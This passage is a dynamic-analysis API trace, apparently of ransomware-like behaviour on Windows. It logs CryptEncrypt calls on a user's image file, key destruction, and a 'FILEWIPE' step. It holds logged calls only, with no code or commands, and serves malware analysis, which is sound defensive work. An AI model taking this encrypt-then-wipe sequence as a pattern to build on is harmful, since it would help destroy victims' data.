wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.663] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.663] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.663] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.663] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.663] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.663] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x6218, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x6220) returned 1 [0039.663] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] CharLowerBuffW (in: lpsz="byte[25121]", cchLength=0xb | out: lpsz="byte[25121]") returned 0xb [0039.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.664] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.664] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.664] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xad2678*, pdwDataLen=0x6ae220*=0x6218, dwBufLen=0x6220 | out: pbData=0xad2678*, pdwDataLen=0x6ae220*=0x6220) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.665] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.665] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.665] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.666] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0039.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.668] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.671] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.671] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.671] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.671] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.671] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.671] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0039.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.671] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.671] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.672] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.672] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.672] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.672] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.672] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.672] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.673] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.673] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.673] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.673] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.673] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.674] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0039.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.674] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0039.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.674] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x83e53da0, ftLastWriteTime.dwHighDateTime=0x1d5bbf8, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0x7c2240 [0039.675] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.675] CharLowerBuffW (in: lpsz="byte[25112]", cchLength=0xb | out: lpsz="byte[25112]") returned 0xb [0039.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.675] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.675] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.675] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.675] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 